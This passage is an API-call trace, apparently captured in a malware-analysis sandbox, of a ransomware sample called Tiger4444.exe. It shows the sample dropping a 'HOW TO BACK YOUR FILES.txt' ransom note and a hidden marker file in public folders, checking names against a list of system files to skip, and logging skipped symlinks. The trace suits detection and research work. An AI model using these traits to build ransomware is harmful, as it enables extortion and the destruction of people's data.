ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0044.910] FindClose (in: hFindFile=0xc72d88 | out: hFindFile=0xc72d88) returned 1 [0044.911] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.911] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\libraries\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.911] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.911] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.911] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.911] CloseHandle (hObject=0x260) returned 1 [0044.911] CloseHandle (hObject=0x2ac) returned 1 [0044.912] GetCurrentThreadId () returned 0xfa8 [0044.912] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0044.912] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Downloads", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0044.912] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72d48 | out: hHeap=0xc50000) returned 1 [0044.912] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0044.912] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0044.912] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0044.912] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3" [0044.912] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\downloads\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.914] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.926] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.927] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.928] CloseHandle (hObject=0x2ac) returned 1 [0044.928] lstrlenW (lpString="C:\\Users\\Public\\Downloads") returned 25 [0044.928] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.928] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fc97031, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0044.928] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.928] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.928] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.928] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.928] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x7fc97031, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.928] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.928] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.928] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.928] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.928] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.928] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fc97031, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fc97031, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fcbd199, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.929] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.929] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.929] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.929] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.929] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.929] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.929] lstrlenW (lpString="desktop.ini") returned 11 [0044.929] lstrlenW (lpString="Tiger4444") returned 9 [0044.929] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.929] lstrlenW (lpString=".dll") returned 4 [0044.929] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.929] lstrlenW (lpString=".lnk") returned 4 [0044.929] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.929] lstrlenW (lpString=".ini") returned 4 [0044.929] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.930] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0044.930] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0044.930] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.930] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\downloads\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.931] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.931] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.932] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.932] CloseHandle (hObject=0x260) returned 1 [0044.932] CloseHandle (hObject=0x2ac) returned 1 [0044.933] GetCurrentThreadId () returned 0xfa8 [0044.933] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0044.933] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\Public\\Documents", iMaxLength=2048 | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0044.933] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72ec8 | out: hHeap=0xc50000) returned 1 [0044.933] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0044.933] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0044.934] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0044.934] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3" [0044.934] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\public\\documents\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.936] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.938] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.940] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.940] CloseHandle (hObject=0x2ac) returned 1 [0044.940] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0044.940] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.940] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7fce33d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc730c8 [0044.941] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.941] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.941] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.941] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.941] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7fce33d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.941] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.941] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.941] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.941] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.941] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.941] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7fce33d4, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7fce33d4, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7fce33d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.941] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.941] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0044.941] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0044.941] lstrcpyW (in: lpString1=0x30aeadc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.941] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x22) returned 1 [0044.951] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x6) returned 1 [0044.951] lstrlenW (lpString="desktop.ini") returned 11 [0044.951] lstrlenW (lpString="Tiger4444") returned 9 [0044.952] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0044.952] lstrlenW (lpString=".dll") returned 4 [0044.952] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0044.952] lstrlenW (lpString=".lnk") returned 4 [0044.952] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0044.952] lstrlenW (lpString=".ini") returned 4 [0044.952] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0044.952] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="Tiger4444.exe") returned -1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0044.952] lstrcmpiW (lpString1="My Music", lpString2="NTUSER.DAT") returned -1 [0044.952] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0044.952] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music", dwFileAttributes=0x2412) returned 1 [0044.952] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Music\r\n") returned 53 [0044.952] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Music\r\n") returned 53 [0044.952] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.953] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4d0 [0044.953] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x35, lpOverlapped=0x0) returned 1 [0044.954] CloseHandle (hObject=0x260) returned 1 [0044.955] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="Tiger4444.exe") returned -1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0044.955] lstrcmpiW (lpString1="My Pictures", lpString2="NTUSER.DAT") returned -1 [0044.956] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0044.956] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures", dwFileAttributes=0x2412) returned 1 [0044.956] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Pictures\r\n") returned 56 [0044.956] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Pictures\r\n") returned 56 [0044.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.956] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x505 [0044.956] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x38, lpOverlapped=0x0) returned 1 [0044.958] CloseHandle (hObject=0x260) returned 1 [0044.958] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="Tiger4444.exe") returned -1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0044.959] lstrcmpiW (lpString1="My Videos", lpString2="NTUSER.DAT") returned -1 [0044.959] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0044.959] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Videos", dwFileAttributes=0x2412) returned 1 [0044.959] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Videos\r\n") returned 54 [0044.959] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Public\\Documents\\My Videos\r\n") returned 54 [0044.959] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.959] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x53d [0044.959] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x36, lpOverlapped=0x0) returned 1 [0044.961] CloseHandle (hObject=0x260) returned 1 [0044.961] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0044.961] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0044.962] lstrcpyW (in: lpString1=0x30aeadc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.962] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\public\\documents\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 